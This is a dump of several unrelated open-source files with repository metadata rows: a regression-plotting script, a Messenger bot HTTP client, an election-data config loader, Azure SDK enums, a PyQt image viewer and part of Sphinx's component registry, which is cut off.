#ax = plt.subplot(1, len(degrees), i + 1)
#plt.setp(ax, xticks=(), yticks=())
polynomial_features = PolynomialFeatures(degree=degrees[i],interaction_only=True,
include_bias=False)
linear_regression = LinearRegression()
pipeline = Pipeline([("polynomial_features", polynomial_features),
("linear_regression", linear_regression)])
#pipeline.fit(X,y)
# Evaluate the models using crossvalidation
scores = cross_validation.cross_val_score(pipeline,
X, y, scoring="mean_squared_error", cv=10)
scores=np.average((abs(scores)**0.5))
avg_score.append(scores)
#plt.plot(X_test, true_fun(X_test), label="True function")
#plt.scatter(X, y, label="Samples")
#plt.xlabel("x")
#plt.ylabel("y")
#plt.xlim((0, 1))
#plt.ylim((-2, 2))
#plt.legend(loc="best")
#plt.title("Degree {}\nMSE = {:.2e}(+/- {:.2e})".format(
#degrees[i], -scores.mean(), scores.std()))
#plt.show()'''
'''print avg_score
plt.scatter(degrees,avg_score)
plt.show()'''
plt.figure(figsize=(14,5))
for i in range(len(degrees)):
ax=plt.subplot(1,len(degrees),i+1)
plt.setp(ax,xticks=(),yticks=())
poly=PolynomialFeatures(degree=degrees[i])
X_train_trans = poly.fit_transform(X_train)
X_test_trans = poly.fit_transform(X_test)
regr =LinearRegression()
regr.fit(X_train_trans,y_train)
y_pred = regr.predict(X_test_trans)
fixed_score.append((mean_squared_error(y_test,y_pred)**0.5))
#plt.plot(range(len(y_test)),(y_test-pipeline.predict(X_test)),range(len(y_test)),[0]*len(y_test))
print fixed_score
plt.scatter(degrees,fixed_score)
plt.show()
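# A self-contained sketch of the same fit/score idea on synthetic data
# (only numpy and scikit-learn assumed; nothing here comes from the
# pickled dataset above):
#
#   Xs = np.sort(np.random.rand(30, 1), axis=0)
#   ys = np.cos(1.5 * np.pi * Xs).ravel() + np.random.randn(30) * 0.1
#   for d in (1, 4, 15):
#       F = PolynomialFeatures(degree=d).fit_transform(Xs)
#       pred = LinearRegression().fit(F, ys).predict(F)
#       print d, mean_squared_error(ys, pred) ** 0.5   # training RMSE shrinks as degree grows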
|
[
"pulkitagrawal2311@gmail.com"
] |
pulkitagrawal2311@gmail.com
|
25e2f3a9ceb559034509a531ca8eec0c56c15cdc
|
9fcf684509bf39dbd7fcf7999e847b88ffb27a44
|
/facebookbot/http_client.py
|
6ec1347131f9b4cf5b5e5e61f03e3e3dc1b1d139
|
[
"Apache-2.0"
] |
permissive
|
tailin/python-messengerbot-sdk
|
916dd36279828ea76d21a5c90e26cf93c8ef1934
|
cbe04b1a6b94b7cd7c04d06348737c041643b242
|
refs/heads/master
| 2020-04-27T11:31:09.368708
| 2019-03-07T07:00:25
| 2019-03-07T07:00:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,280
|
py
|
from __future__ import unicode_literals
from abc import ABCMeta, abstractmethod, abstractproperty
import requests
from future.utils import with_metaclass
class HttpClient(with_metaclass(ABCMeta)):
"""Abstract Base Classes of HttpClient."""
DEFAULT_TIMEOUT = 5
def __init__(self, timeout=DEFAULT_TIMEOUT):
"""__init__ method.
:param timeout: (optional) How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`DEFAULT_TIMEOUT`
:type timeout: float | tuple(float, float)
"""
self.timeout = timeout
@abstractmethod
def get(self, url, headers=None, params=None, stream=False, timeout=None):
"""GET request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param dict params: (optional) Request query parameter
:param bool stream: (optional) get content as stream
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: T <= :py:class:`HttpResponse`
:return: HttpResponse instance
"""
raise NotImplementedError
@abstractmethod
def post(self, url, headers=None, params=None, data=None, timeout=None):
"""POST request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param data: (optional) Dictionary, bytes, or file-like object to send in the body
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: T <= :py:class:`HttpResponse`
:return: HttpResponse instance
"""
raise NotImplementedError
@abstractmethod
def delete(self, url, headers=None, data=None, timeout=None):
"""DELETE request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param data: (optional) Dictionary, bytes, or file-like object to send in the body
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: T <= :py:class:`HttpResponse`
:return: HttpResponse instance
"""
raise NotImplementedError
class RequestsHttpClient(HttpClient):
"""HttpClient implemented by requests."""
def __init__(self, timeout=HttpClient.DEFAULT_TIMEOUT):
"""__init__ method.
:param timeout: (optional) How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`DEFAULT_TIMEOUT`
:type timeout: float | tuple(float, float)
"""
super(RequestsHttpClient, self).__init__(timeout)
def get(self, url, headers=None, params=None, stream=False, timeout=None):
"""GET request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param dict params: (optional) Request query parameter
:param bool stream: (optional) get content as stream
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: :py:class:`RequestsHttpResponse`
:return: RequestsHttpResponse instance
"""
if timeout is None:
timeout = self.timeout
response = requests.get(
url, headers=headers, params=params, stream=stream, timeout=timeout
)
return RequestsHttpResponse(response)
def post(self, url, headers=None, params=None, data=None, timeout=None):
"""POST request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param data: (optional) Dictionary, bytes, or file-like object to send in the body
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: :py:class:`RequestsHttpResponse`
:return: RequestsHttpResponse instance
"""
if timeout is None:
timeout = self.timeout
response = requests.post(
url, headers=headers, params=params, data=data, timeout=timeout
)
return RequestsHttpResponse(response)
def delete(self, url, headers=None, data=None, timeout=None):
"""DELETE request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param data: (optional) Dictionary, bytes, or file-like object to send in the body
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: :py:class:`RequestsHttpResponse`
:return: RequestsHttpResponse instance
"""
if timeout is None:
timeout = self.timeout
response = requests.delete(
url, headers=headers, data=data, timeout=timeout
)
return RequestsHttpResponse(response)
class HttpResponse(with_metaclass(ABCMeta)):
"""HttpResponse."""
@abstractproperty
def status_code(self):
"""Get status code."""
raise NotImplementedError
@abstractproperty
def headers(self):
"""Get headers."""
raise NotImplementedError
@abstractproperty
def text(self):
"""Get request body as text-decoded."""
raise NotImplementedError
@abstractproperty
def content(self):
"""Get request body as binary."""
raise NotImplementedError
@abstractproperty
def json(self):
"""Get request body as json-decoded."""
raise NotImplementedError
@abstractmethod
def iter_content(self, chunk_size=1024, decode_unicode=False):
"""Get request body as iterator content (stream).
:param int chunk_size:
:param bool decode_unicode:
"""
raise NotImplementedError
class RequestsHttpResponse(HttpResponse):
"""HttpResponse implemented by requests lib's response."""
def __init__(self, response):
"""__init__ method.
:param response: requests lib's response
"""
self.response = response
@property
def status_code(self):
"""Get status code."""
return self.response.status_code
@property
def headers(self):
"""Get headers."""
return self.response.headers
@property
def text(self):
"""Get request body as text-decoded."""
return self.response.text
@property
def content(self):
"""Get request body as binary."""
return self.response.content
@property
def json(self):
"""Get request body as json-decoded."""
return self.response.json()
def iter_content(self, chunk_size=1024, decode_unicode=False):
"""Get request body as iterator content (stream).
:param int chunk_size:
:param bool decode_unicode:
"""
return self.response.iter_content(chunk_size=chunk_size, decode_unicode=decode_unicode)
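# Usage sketch (the URL is a placeholder, not part of this module):
#
#   client = RequestsHttpClient(timeout=10)
#   res = client.get('https://example.com/', headers={'Accept': 'text/html'})
#   print(res.status_code)   # delegates to the wrapped requests.Response
#   print(res.text[:80])     # text property defined above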
|
[
"t0915290092@gmail.com"
] |
t0915290092@gmail.com
|
985dad9eac8bbe27fa5b3adfb04734809e871ce4
|
ae16f9dd815605e5f52f27dda77bd735abafb587
|
/parser/councilors/elections_config.py
|
1bf0e2a7db9c45f4024b1026e1cd6c38e1f368c0
|
[
"CC0-1.0"
] |
permissive
|
travishen/councilor-voter-guide
|
aa4a1aa3b86db9ca40b291baf461ff0330a369c0
|
09d9365676335854b2d4d0981f5cb925adf4c958
|
refs/heads/master
| 2020-04-13T10:09:07.688276
| 2018-11-28T14:51:05
| 2018-11-28T14:51:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,827
|
py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import sys
sys.path.append('../')
import re
import json
import psycopg2
import ast
from sys import argv
import gspread
from oauth2client.service_account import ServiceAccountCredentials
import db_settings
conn = db_settings.con()
c = conn.cursor()
election_year = ast.literal_eval(argv[1])['election_year']
def parse_districts(county, districts):
districts = re.sub(u'^(居住|【)', '', districts)
category = re.search(u'(平地原住民|山地原住民)$', districts)
districts = re.sub(u'(平地原住民|山地原住民)$', '', districts)
if category:
category = category.group()
districts = re.sub(u'(】|之)', '', districts)
l = []
if districts:
for district in districts.split(u'、'):
if len(district) == 2:
l = districts.split(u'、')
break
if not re.search(re.sub(u'[縣市]$', '', county), district):
district = re.sub(u'[鄉鎮市區]$', '', district)
l.append(district)
return l, category
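# Worked example (sketch, hypothetical input): parse_districts(u'新竹縣',
# u'居住竹北市、峨眉鄉平地原住民') strips the 居住 prefix, captures the
# 平地原住民 category, drops the 市/鄉 suffixes, and returns
# ([u'竹北', u'峨眉'], u'平地原住民').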
# update constituencies
constituencies = json.load(open('../../voter_guide/static/json/dest/constituencies_%s.json' % election_year))
counties = {}
for region in constituencies:
if region['county'] not in counties.keys():
counties.update({
region['county']: {
'regions': [],
'duplicated': []
}
})
districts_list, category = parse_districts(region['county'], region['district'])
if category:
if districts_list:
district = u'%s(%s)' % (category, u'、'.join(districts_list))
else:
district = u'%s(%s)' % (category, u'全%s' % region['county'])
else:
district = u'、'.join(districts_list)
counties[region['county']]['regions'].append({
'constituency': region['constituency'],
'districts_list': districts_list,
'district': district,
'category': category
})
c.execute('''
update candidates_terms
set district = %s
where election_year = %s and county = %s and constituency = %s
''', (district, election_year, region['county'], region['constituency']))
scope = ['https://spreadsheets.google.com/feeds']
credentials = ServiceAccountCredentials.from_json_keyfile_name('credential.json', scope)
gc = gspread.authorize(credentials)
sh = gc.open_by_key('10zFDmMF9CJDXSIENXO8iJXKE5CLBY62i_mSeqe_qDug')
worksheets = sh.worksheets()
for wks in worksheets:
rows = wks.get_all_records()
if wks.title == u'議員':
for row in rows:
print row['county'], row['constituency']
if row['count_this']:
counties[row['county']]['regions'][int(row['constituency'])-1]['elected_count_pre'] = row['count_pre']
counties[row['county']]['regions'][int(row['constituency'])-1]['elected_count'] = row['count_this']
counties[row['county']]['regions'][int(row['constituency'])-1]['reserved_seats'] = row['reserved_seats']
else:
continue
config = json.dumps({'constituencies': counties})
c.execute('''
INSERT INTO elections_elections(id, data)
VALUES (%s, %s)
ON CONFLICT (id)
DO UPDATE
SET data = (COALESCE(elections_elections.data, '{}'::jsonb) || %s::jsonb)
''', [election_year, config, config])
conn.commit()
# update constituency_change
district_versions = json.load(open('../district_versions.json'))
config = json.dumps({'constituency_change': district_versions.get(election_year, {})})
c.execute('''
INSERT INTO elections_elections(id, data)
VALUES (%s, %s)
ON CONFLICT (id)
DO UPDATE
SET data = (COALESCE(elections_elections.data, '{}'::jsonb) || %s::jsonb)
''', [election_year, config, config])
conn.commit()
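# Sketch of the upsert pattern used twice above: on a duplicate id the
# jsonb `||` operator merges top-level keys, e.g.
#   '{"constituencies": {...}}'::jsonb || '{"constituency_change": {...}}'::jsonb
# so one row per election_year ends up holding both keys.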
|
[
"twly.tw@gmail.com"
] |
twly.tw@gmail.com
|
c47b2a335796c963552a994e83d36361618a343d
|
7073c53c421018bd1a2c8a14e55c61bcf7c8ed04
|
/ask_1.py
|
c1ef86a87a8fd62f35b2730de5a77d797f38205a
|
[] |
no_license
|
AntonisEkatommatis/1o_Eksamino_PYTHON
|
0a0e075a2bff9705bca34ab3064ae58eab3305e1
|
d9c019d62bed1ed71f9c4a441c0fb814ffa3a730
|
refs/heads/master
| 2020-04-21T14:40:08.915040
| 2019-02-12T19:32:55
| 2019-02-12T19:32:55
| 169,642,646
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,076
|
py
|
# Assignment 1
# Antonis Ekatommatis
# Introduction to Computer Science
# 1st Semester
# Function definition
def sumIntervals(L):
a=[]
b=[]
asin=0
bsin=0
apot=0
    # Put every interval's start point into list a
for i in range(len(L)):
a.append(L[i][0])
    # Put every interval's end point into list b
for i in range(len(L)):
b.append(L[i][1])
#Bubblesort
N=len(a)
for i in range(1,N,1):
for j in range(N-1,i-1,-1):
if a[j] < a[j-1]:
a[j],a[j-1]=a[j-1],a[j]
b[j],b[j-1]=b[j-1],b[j]
    # Adjust overlapping bounds so the two sums yield the union length
for i in range(1,len(a)):
while a[i] < b[i-1]:
a[i]=a[i]+1
for i in range(len(a)):
while a[i] > b[i]:
b[i]=b[i]+1
for item in a:
asin+=item
for item in b:
bsin+=item
apot=bsin-asin
return apot
print sumIntervals([[1,2], [6, 10], [11, 15]])
print sumIntervals([[1,4], [7, 10], [3, 5]])
print sumIntervals([[1,5], [10, 20], [1, 6], [16, 19], [5, 11]])
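# Worked example (sketch): for [[1,4], [7,10], [3,5]] the sorted starts are
# a = [1, 3, 7] and ends b = [4, 5, 10]; the first loop lifts the
# overlapping start 3 up to 4, so apot = (4+5+10) - (1+4+7) = 7, the
# length of the union [1,5] + [7,10] -- matching the second print above.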
|
[
"antonismatis@gmail.com"
] |
antonismatis@gmail.com
|
447d86e8e9209462fd50b2b94da10ea4ce9f191d
|
582cf2295d4b4666421da511507858435912ea30
|
/Sample.py
|
0a4cf81985e2de9af19913e6e31e192aa913f273
|
[] |
no_license
|
limjisooooooo/z
|
bfe71ba18fe186e02be5e7908d3068d86e9f63db
|
cf0dc6f3de63decd69ecd7f139740334807054bc
|
refs/heads/master
| 2020-04-27T04:13:53.611372
| 2019-03-28T08:46:28
| 2019-03-28T08:46:28
| 174,047,811
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 838
|
py
|
import sys
import base64
from PyQt5.QtWidgets import *
#from PyQt5.QtGui import *
class Form(QMainWindow):
def __init__(self):
super().__init__()
self.browser = QTextBrowser(self)
self.browser.setGeometry(0, 0, 471, 401)
self.setGeometry(0, 0, 500, 500)
self.btnFile = QPushButton(self)
self.btnFile.setGeometry(2, 430, 25, 25)
self.btnFile.clicked.connect(self.fopen)
self.show()
self.setWindowTitle('Sample')
def fopen(self):
FileName, Filter = QFileDialog.getOpenFileUrl()
if FileName.path() != "":
f = open(FileName.path()[1:], 'rb')
data = base64.b64encode(f.read())
#print(data)
self.browser.append("<img src='data:image/jpeg;base64, " + data.decode() + "' alt='Image Can't Load'/>")
f.close()
if __name__ == '__main__':
app = QApplication(sys.argv)
w = Form()
sys.exit(app.exec())
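# Sketch of the data URI built in fopen(): base64.b64encode() turns the
# raw image bytes into ASCII (a JPEG starting ff d8 ff encodes as "/9j/"),
# and QTextBrowser renders the resulting
#   <img src='data:image/jpeg;base64, /9j/...'/>
# like any other HTML image, so no temporary file is needed.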
|
[
"trefrasd@gmail.com"
] |
trefrasd@gmail.com
|
25b980a0be5f061c6bdc488b9c6e51969e8a81c7
|
ceb5b7c3882b2bf3f53219356e914462c680f059
|
/azure-mgmt-compute/azure/mgmt/compute/containerservice/v2017_01_31/models/container_service_client_enums.py
|
279f5dcb9d3ff37bd26b6e9a9c88b555f28c3dff
|
[
"MIT"
] |
permissive
|
codalab/azure-sdk-for-python
|
b712da2a377cfa526e0ffa4fa40408e6a81e48e3
|
f4c92d02d46fcdee9da430a18a394b108a2f8920
|
refs/heads/master
| 2021-01-19T14:40:23.567035
| 2017-04-11T22:49:13
| 2017-04-11T22:49:13
| 88,180,409
| 1
| 0
| null | 2017-04-13T15:36:45
| 2017-04-13T15:36:44
| null |
UTF-8
|
Python
| false
| false
| 2,291
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from enum import Enum
class ContainerServiceOchestratorTypes(Enum):
swarm = "Swarm"
dcos = "DCOS"
custom = "Custom"
kubernetes = "Kubernetes"
class ContainerServiceVMSizeTypes(Enum):
standard_a0 = "Standard_A0"
standard_a1 = "Standard_A1"
standard_a2 = "Standard_A2"
standard_a3 = "Standard_A3"
standard_a4 = "Standard_A4"
standard_a5 = "Standard_A5"
standard_a6 = "Standard_A6"
standard_a7 = "Standard_A7"
standard_a8 = "Standard_A8"
standard_a9 = "Standard_A9"
standard_a10 = "Standard_A10"
standard_a11 = "Standard_A11"
standard_d1 = "Standard_D1"
standard_d2 = "Standard_D2"
standard_d3 = "Standard_D3"
standard_d4 = "Standard_D4"
standard_d11 = "Standard_D11"
standard_d12 = "Standard_D12"
standard_d13 = "Standard_D13"
standard_d14 = "Standard_D14"
standard_d1_v2 = "Standard_D1_v2"
standard_d2_v2 = "Standard_D2_v2"
standard_d3_v2 = "Standard_D3_v2"
standard_d4_v2 = "Standard_D4_v2"
standard_d5_v2 = "Standard_D5_v2"
standard_d11_v2 = "Standard_D11_v2"
standard_d12_v2 = "Standard_D12_v2"
standard_d13_v2 = "Standard_D13_v2"
standard_d14_v2 = "Standard_D14_v2"
standard_g1 = "Standard_G1"
standard_g2 = "Standard_G2"
standard_g3 = "Standard_G3"
standard_g4 = "Standard_G4"
standard_g5 = "Standard_G5"
standard_ds1 = "Standard_DS1"
standard_ds2 = "Standard_DS2"
standard_ds3 = "Standard_DS3"
standard_ds4 = "Standard_DS4"
standard_ds11 = "Standard_DS11"
standard_ds12 = "Standard_DS12"
standard_ds13 = "Standard_DS13"
standard_ds14 = "Standard_DS14"
standard_gs1 = "Standard_GS1"
standard_gs2 = "Standard_GS2"
standard_gs3 = "Standard_GS3"
standard_gs4 = "Standard_GS4"
standard_gs5 = "Standard_GS5"
|
[
"lmazuel@microsoft.com"
] |
lmazuel@microsoft.com
|
825006c894ca28563ceb49ebb22caa4eb6aead20
|
4e0c1615c467c63524db9a33d0e769f1370f5a12
|
/python-ops/training/exercise/test/murthy/r30.py
|
ae1cc0288d7548781efef0cae97dc498836eb388
|
[] |
no_license
|
infra-ops/cloud-ops
|
1afb44ed29000491aaa5420ebc6e0b8d740fc55c
|
4f676fde13f33c838f7f17affd705966a6d31da2
|
refs/heads/master
| 2023-08-27T03:00:32.867645
| 2023-08-23T14:27:59
| 2023-08-23T14:27:59
| 140,283,053
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 64
|
py
|
values = [100,200,300,400]
slice = values[1:3]
print(slice)
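# Sketch: values[1:3] takes the half-open index range [1, 3), i.e. the
# items at indexes 1 and 2, so the script prints [200, 300]; note the
# name `slice` shadows the built-in slice() type.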
|
[
"chakraborty.rock@gmail.com"
] |
chakraborty.rock@gmail.com
|
14c97cc76c6333d459e2b615402d70304853e1d8
|
520a9b3d11f4a4ce93d0927a8fd5c575252b3559
|
/lib/python2.7/site-packages/sphinx/registry.py
|
cdae7722411e7bcd78f8a786996f665d8862a229
|
[
"Apache-2.0"
] |
permissive
|
Larsende/F5_Agility_2018_Security_in_AWS
|
90c7404962313b13cec63321e6fc38bdc9516dd0
|
1bebcf9d441a3e3b7348757fcbc83844fbb0132e
|
refs/heads/master
| 2020-03-20T02:23:59.099742
| 2018-08-12T15:28:50
| 2018-08-12T15:28:50
| 137,111,587
| 0
| 2
|
Apache-2.0
| 2018-08-03T21:19:48
| 2018-06-12T18:21:58
|
Python
|
UTF-8
|
Python
| false
| false
| 15,315
|
py
|
# -*- coding: utf-8 -*-
"""
sphinx.registry
~~~~~~~~~~~~~~~
Sphinx component registry.
:copyright: Copyright 2007-2016 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from __future__ import print_function
import traceback
from pkg_resources import iter_entry_points
from six import iteritems, itervalues, string_types
from sphinx.domains import ObjType
from sphinx.domains.std import GenericObject, Target
from sphinx.errors import ExtensionError, SphinxError, VersionRequirementError
from sphinx.extension import Extension
from sphinx.locale import __
from sphinx.parsers import Parser as SphinxParser
from sphinx.roles import XRefRole
from sphinx.util import import_object
from sphinx.util import logging
from sphinx.util.console import bold # type: ignore
from sphinx.util.docutils import directive_helper
if False:
# For type annotation
from typing import Any, Callable, Dict, Iterator, List, Type, Union # NOQA
from docutils import nodes # NOQA
from docutils.io import Input # NOQA
from docutils.parsers import Parser # NOQA
from docutils.transforms import Transform # NOQA
from sphinx.application import Sphinx # NOQA
from sphinx.builders import Builder # NOQA
from sphinx.domains import Domain, Index # NOQA
from sphinx.environment import BuildEnvironment # NOQA
from sphinx.ext.autodoc import Documenter # NOQA
from sphinx.util.typing import RoleFunction # NOQA
logger = logging.getLogger(__name__)
# List of deprecated extensions. Keys are extension names.
# Values are the Sphinx version that merged in the extension.
EXTENSION_BLACKLIST = {
"sphinxjp.themecore": "1.2"
} # type: Dict[unicode, unicode]
class SphinxComponentRegistry(object):
def __init__(self):
self.autodoc_attrgettrs = {} # type: Dict[Type, Callable[[Any, unicode, Any], Any]]
self.builders = {} # type: Dict[unicode, Type[Builder]]
self.documenters = {} # type: Dict[unicode, Type[Documenter]]
self.domains = {} # type: Dict[unicode, Type[Domain]]
self.domain_directives = {} # type: Dict[unicode, Dict[unicode, Any]]
self.domain_indices = {} # type: Dict[unicode, List[Type[Index]]]
self.domain_object_types = {} # type: Dict[unicode, Dict[unicode, ObjType]]
self.domain_roles = {} # type: Dict[unicode, Dict[unicode, Union[RoleFunction, XRefRole]]] # NOQA
self.post_transforms = [] # type: List[Type[Transform]]
self.source_parsers = {} # type: Dict[unicode, Parser]
self.source_inputs = {} # type: Dict[unicode, Input]
self.translators = {} # type: Dict[unicode, nodes.NodeVisitor]
self.transforms = [] # type: List[Type[Transform]]
def add_builder(self, builder):
# type: (Type[Builder]) -> None
logger.debug('[app] adding builder: %r', builder)
if not hasattr(builder, 'name'):
raise ExtensionError(__('Builder class %s has no "name" attribute') % builder)
if builder.name in self.builders:
raise ExtensionError(__('Builder %r already exists (in module %s)') %
(builder.name, self.builders[builder.name].__module__))
self.builders[builder.name] = builder
def preload_builder(self, app, name):
# type: (Sphinx, unicode) -> None
if name is None:
return
if name not in self.builders:
entry_points = iter_entry_points('sphinx.builders', name)
try:
entry_point = next(entry_points)
except StopIteration:
raise SphinxError(__('Builder name %s not registered or available'
' through entry point') % name)
self.load_extension(app, entry_point.module_name)
def create_builder(self, app, name):
# type: (Sphinx, unicode) -> Builder
if name not in self.builders:
raise SphinxError(__('Builder name %s not registered') % name)
return self.builders[name](app)
def add_domain(self, domain):
# type: (Type[Domain]) -> None
logger.debug('[app] adding domain: %r', domain)
if domain.name in self.domains:
raise ExtensionError(__('domain %s already registered') % domain.name)
self.domains[domain.name] = domain
def has_domain(self, domain):
# type: (unicode) -> bool
return domain in self.domains
def create_domains(self, env):
# type: (BuildEnvironment) -> Iterator[Domain]
for DomainClass in itervalues(self.domains):
domain = DomainClass(env)
# transplant components added by extensions
domain.directives.update(self.domain_directives.get(domain.name, {}))
domain.roles.update(self.domain_roles.get(domain.name, {}))
domain.indices.extend(self.domain_indices.get(domain.name, []))
for name, objtype in iteritems(self.domain_object_types.get(domain.name, {})):
domain.add_object_type(name, objtype)
yield domain
def override_domain(self, domain):
# type: (Type[Domain]) -> None
logger.debug('[app] overriding domain: %r', domain)
if domain.name not in self.domains:
raise ExtensionError(__('domain %s not yet registered') % domain.name)
if not issubclass(domain, self.domains[domain.name]):
raise ExtensionError(__('new domain not a subclass of registered %s '
'domain') % domain.name)
self.domains[domain.name] = domain
def add_directive_to_domain(self, domain, name, obj,
has_content=None, argument_spec=None, **option_spec):
# type: (unicode, unicode, Any, bool, Any, Any) -> None
logger.debug('[app] adding directive to domain: %r',
(domain, name, obj, has_content, argument_spec, option_spec))
if domain not in self.domains:
raise ExtensionError(__('domain %s not yet registered') % domain)
directives = self.domain_directives.setdefault(domain, {})
directives[name] = directive_helper(obj, has_content, argument_spec, **option_spec)
def add_role_to_domain(self, domain, name, role):
# type: (unicode, unicode, Union[RoleFunction, XRefRole]) -> None
logger.debug('[app] adding role to domain: %r', (domain, name, role))
if domain not in self.domains:
raise ExtensionError(__('domain %s not yet registered') % domain)
roles = self.domain_roles.setdefault(domain, {})
roles[name] = role
def add_index_to_domain(self, domain, index):
# type: (unicode, Type[Index]) -> None
logger.debug('[app] adding index to domain: %r', (domain, index))
if domain not in self.domains:
raise ExtensionError(__('domain %s not yet registered') % domain)
indices = self.domain_indices.setdefault(domain, [])
indices.append(index)
def add_object_type(self, directivename, rolename, indextemplate='',
parse_node=None, ref_nodeclass=None, objname='',
doc_field_types=[]):
# type: (unicode, unicode, unicode, Callable, nodes.Node, unicode, List) -> None
logger.debug('[app] adding object type: %r',
(directivename, rolename, indextemplate, parse_node,
ref_nodeclass, objname, doc_field_types))
# create a subclass of GenericObject as the new directive
directive = type(directivename, # type: ignore
(GenericObject, object),
{'indextemplate': indextemplate,
'parse_node': staticmethod(parse_node),
'doc_field_types': doc_field_types})
self.add_directive_to_domain('std', directivename, directive)
self.add_role_to_domain('std', rolename, XRefRole(innernodeclass=ref_nodeclass))
object_types = self.domain_object_types.setdefault('std', {})
object_types[directivename] = ObjType(objname or directivename, rolename)
def add_crossref_type(self, directivename, rolename, indextemplate='',
ref_nodeclass=None, objname=''):
# type: (unicode, unicode, unicode, nodes.Node, unicode) -> None
logger.debug('[app] adding crossref type: %r',
(directivename, rolename, indextemplate, ref_nodeclass, objname))
# create a subclass of Target as the new directive
directive = type(directivename, # type: ignore
(Target, object),
{'indextemplate': indextemplate})
self.add_directive_to_domain('std', directivename, directive)
self.add_role_to_domain('std', rolename, XRefRole(innernodeclass=ref_nodeclass))
object_types = self.domain_object_types.setdefault('std', {})
object_types[directivename] = ObjType(objname or directivename, rolename)
def add_source_parser(self, suffix, parser):
# type: (unicode, Type[Parser]) -> None
logger.debug('[app] adding search source_parser: %r, %r', suffix, parser)
if suffix in self.source_parsers:
raise ExtensionError(__('source_parser for %r is already registered') % suffix)
self.source_parsers[suffix] = parser
def get_source_parser(self, filename):
# type: (unicode) -> Type[Parser]
for suffix, parser_class in iteritems(self.source_parsers):
if filename.endswith(suffix):
break
else:
# use special parser for unknown file-extension '*' (if exists)
parser_class = self.source_parsers.get('*')
if parser_class is None:
raise SphinxError(__('source_parser for %s not registered') % filename)
else:
if isinstance(parser_class, string_types):
parser_class = import_object(parser_class, 'source parser') # type: ignore
return parser_class
def get_source_parsers(self):
# type: () -> Dict[unicode, Parser]
return self.source_parsers
def create_source_parser(self, app, filename):
# type: (Sphinx, unicode) -> Parser
parser_class = self.get_source_parser(filename)
parser = parser_class()
if isinstance(parser, SphinxParser):
parser.set_application(app)
return parser
def add_source_input(self, input_class):
# type: (Type[Input]) -> None
for filetype in input_class.supported:
if filetype in self.source_inputs:
raise ExtensionError(__('source_input for %r is already registered') %
filetype)
self.source_inputs[filetype] = input_class
def get_source_input(self, filename):
# type: (unicode) -> Type[Input]
parser = self.get_source_parser(filename)
for filetype in parser.supported:
if filetype in self.source_inputs:
input_class = self.source_inputs[filetype]
break
else:
# use special source_input for unknown file-type '*' (if exists)
input_class = self.source_inputs.get('*')
if input_class is None:
raise SphinxError(__('source_input for %s not registered') % filename)
else:
return input_class
def add_translator(self, name, translator):
# type: (unicode, Type[nodes.NodeVisitor]) -> None
logger.info(bold(__('Change of translator for the %s builder.') % name))
self.translators[name] = translator
def get_translator_class(self, builder):
# type: (Builder) -> Type[nodes.NodeVisitor]
return self.translators.get(builder.name,
builder.default_translator_class)
def create_translator(self, builder, document):
# type: (Builder, nodes.Node) -> nodes.NodeVisitor
translator_class = self.get_translator_class(builder)
return translator_class(builder, document)
def add_transform(self, transform):
# type: (Type[Transform]) -> None
logger.debug('[app] adding transform: %r', transform)
self.transforms.append(transform)
def get_transforms(self):
# type: () -> List[Type[Transform]]
return self.transforms
def add_post_transform(self, transform):
# type: (Type[Transform]) -> None
logger.debug('[app] adding post transform: %r', transform)
self.post_transforms.append(transform)
def get_post_transforms(self):
# type: () -> List[Type[Transform]]
return self.post_transforms
def add_documenter(self, objtype, documenter):
# type: (unicode, Type[Documenter]) -> None
self.documenters[objtype] = documenter
def add_autodoc_attrgetter(self, typ, attrgetter):
# type: (Type, Callable[[Any, unicode, Any], Any]) -> None
self.autodoc_attrgettrs[typ] = attrgetter
def load_extension(self, app, extname):
# type: (Sphinx, unicode) -> None
"""Load a Sphinx extension."""
        if extname in app.extensions:  # already loaded
return
if extname in EXTENSION_BLACKLIST:
logger.warning(__('the extension %r was already merged with Sphinx since '
'version %s; this extension is ignored.'),
extname, EXTENSION_BLACKLIST[extname])
return
# update loading context
app._setting_up_extension.append(extname)
try:
mod = __import__(extname, None, None, ['setup'])
except ImportError as err:
logger.verbose(__('Original exception:\n') + traceback.format_exc())
raise ExtensionError(__('Could not import extension %s') % extname, err)
if not hasattr(mod, 'setup'):
logger.warning(__('extension %r has no setup() function; is it really '
